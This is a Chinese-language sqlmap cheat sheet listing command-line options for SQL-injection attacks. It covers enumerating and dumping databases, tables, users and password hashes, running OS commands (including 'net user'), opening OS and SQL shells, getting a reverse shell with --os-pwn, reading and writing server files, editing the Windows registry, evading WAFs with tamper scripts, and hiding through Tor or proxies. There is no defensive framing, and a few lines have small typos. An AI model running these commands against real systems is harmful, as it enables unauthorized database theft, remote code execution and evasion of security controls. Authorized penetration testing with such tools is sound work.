sqlmap

命令行:

sqlmap.py -u url

sqlmap.py -u url --dbs

sqlmap.py -u url --current-db

sqlmap.py -u url --table -D database

sqlmap.py -u url --column -T  tables -D database

sqlmap.py -u url --dump -C "columns"  -T "[USER]" -D databases

参数：

•  //测试注入点的权限

sqlmap.py -u url -- privileges

sqlmap.py -u url -- privileges  -U sa 

• //执行shell命令

sqlmap.py -u url --os-cmd="net user"

sqlmap.py -u url --os-shell

• //获取当前数据库

sqlmap.py -u url --current-db

• //执行sal命令

sqlmap.py -u url --sql-shell

sqlmap.py -u url --sql-query=“sql”

• //post提交方式

sqlmap.py -u url --data “post参数”

• //显示详细的等级

sqlmap.py -u url --dbs -v 1

0：只显示pytho你的回溯、错误和关键信息

1：显示信息和警告信息

2：显示调试信息

3：有效载荷注入

4：显示http请求

5：显示http响应头

6：显示http响应页面的内容

• //注入http请求

sqlmap.py -r head.txt --dbs  //head.txt的内容时http请求

• //直接连到数据库

sqlmap.py -d "mysql://admin:admin@192.168.1.1:3306/testdb" --dbs

• //注入等级

sqlmap.py -u url --level 3

• //将注入语句插到指定位置

sqlmap.py -u url/id/a*.html --dbs

• //使用sqlmap插件

sqlmap.py -u url  -tamper "space2morehash.py"

sqlmap中的插件都保存在tamper文件中，可以用来绕过waf

• //sqlmap常用的参数说明p93

-b 获取banner

-p 指定测试参数

-g 从Google中获url

--union-check 是否支持union注入

--union-cols union查询表记录

--union-test union语句测试

--union-use union注入

--proxy 代理注入

--string 指定关键词

--tor指定tor的匿名网络

--predict-output 常见的查询输出预测

--keep-alive 使用持久http（s）连接

--eval=evalcode  使用http参数污染，在对参数进行代码执行

-a，-all 查询所有

--hostname 主机名

--is-dba 是否是管理员权限

--users 枚举所有的用户

--passwords 枚举所有的密码

--roles 枚举所有的用户角色

--schema 枚举DBMS模式

--count 检索所有的条目数

--dump 转存DBMS数据库项目，需要制定字段名称（列名称）

--dump-all 转存DBMS数据库所有的表项目

--search 搜索列、表或者数据名称

--exclude-sysdbs 在枚举表时排除系统数据库

--sql-query=query 执行sql语句

--file-read=rfile 读取操作

--file-write=wfile 写入操作

--file-dest=dfile 绝对路径写入

--reg-read 读取一个windows注册表的值

--reg-add 增加一个windows注册表的值

--reg-del 删除一个注册表的值

--reg-key=regkey windows注册表键

--reg-value=regval windows注册表键值

--reg-data=redata windows的注册表键值项数据

--reg-type-regtype windows的注册表键值的类型

--dump-format=dump 转存数据格式（csv，html，sqlite）

--hex 使用十六进制检索功能

--output-dir=odir 自定义输出的目录路径

--update 更新sqlmap

--purge-output 安全删除多有内容的输出目录

--check-waf 启发式检查waf/ips/ids保护

--os-pwn 反弹shell

--cookie=cookie 指定cookie

--random-agent使用随机选定的user-agent头

--tamper=tamper 使用sqlmap插件

--level 测试等级